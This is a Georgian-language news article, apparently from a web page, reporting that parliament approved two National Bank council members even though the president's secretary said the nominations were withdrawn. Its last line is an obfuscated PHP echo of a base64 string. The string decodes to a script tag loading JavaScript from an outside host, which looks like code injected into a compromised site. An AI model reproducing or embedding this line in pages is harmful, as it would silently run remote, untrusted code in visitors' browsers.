celsiusi
ავერსი საქკაბელი

 პარლამენტმა ეროვნული ბანკის საბჭოს წევრებად პრეზიდენტის მიერ წარდგენილი ნანა ყეინიშვილის და თეიმურაზ ხომერიკის კანდიდატურებს მხარი დაუჭირა.

სხდომის თავმჯდომარე, შალვა პაპუაშვილმა სებ-ის საბჭოს ახალ წევრებს წარმატებული საქმიანობა უსურვა.  

კენჭისყრის შედეგების თანახმად, ნანა ყეინიშვილს მხარი დაუჭირა 84-მა დეპუტატმა, ხოლო წინააღმდეგ წავიდა არც ერთი დეპუტატი, რაც შეეხება თეიმურაზ ხომერიკს, მის კანდიდატურას მხარი დაუჭირა 82-მა დეპუტატმა, ხოლო უარი არც ერთ დეპუტატს არ განუცხადებია.

სხდომამდე საკითხი განიხილეს საფინანსო საბიუჯეტო და დარგობრივი ეკონომიკის კომიტეტების გაერთიანებულ სხდომაზე, სადაც დღის წესრიგით გათვალისწინებული იყო საქართველოს ეროვნული ბანკის საბჭოს წევრის თანამდებობაზე პრეზიდენტის მიერ წარდგენილი ნანა ყეინიშვილის და თეიმურაზ ხომერიკის კანდიდატურების განხილვა, თუმცა, კანდიდატები კომიტეტის სხდომაზე არ გამოცხადდნენ.

პრეზიდენტის საპარლამენტო მდივნის გიორგი მსხილაძის განაცხადებით, ბოლო ორი დღის განმავლობაში ეროვნული ბანკის გარშემო განვითარებული მოვლენების შემდეგ  საქართველოს პრეზიდენტი უარს აცხადებს კანდიდატურების წარდგენაზე.

„ეროვნული ბანკის გარშემო განვითარებული მოვლენების შემდეგ პრეზიდენტს არ მიაჩნია, რომ არსებულ ვითარებაში, როცა არ არის ნათელი ეროვნული ბანკი ემსახურება ქართველ ხალხს თუ კონკრეტულ პირებს, წარმოადგინოს ეროვნული ბანკის საბჭოს წევრობის კანდიდატები. შესაბამისად, კანდიდატებიც არ იმყოფებიან კომიტეტების სხდომაზე.

აღნიშნულ მდგომარეობაში, ვიდრე არ გაირკვევა ეროვნული ბანკის გარშემო სიტუაცია, არ გაუქმდება ეროვნული ბანკის პრეზიდენტის მოვალეობის შემსრულებლის 2023 წლის 19 სექტემბრის ბრძანებულება, მანამდე მიზანშეუწონლად მიგვაჩნია კანდიდატების წარმოდგენა“, - განაცხადა პრეზიდენტის საპარლამენტო მდივანმა.

საფინანსო-საბიუჯეტო კომიტეტის თავმჯდომარის, პაატა კვიჟინაძის განცხადებით,  კანონის შესაბამისად, კომიტეტს მიზანშეწონილად მიაჩნია პარლამენტის პლენარულ სხდომაზე კანდიდატების კენჭისყრა მოხდეს განხილვისა და მოსმენის გარეშე.

პარლამენტის პლენარულ სესიაზე საკითხს კენჭი უყარეს, განხილვების გარეშე.

270
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");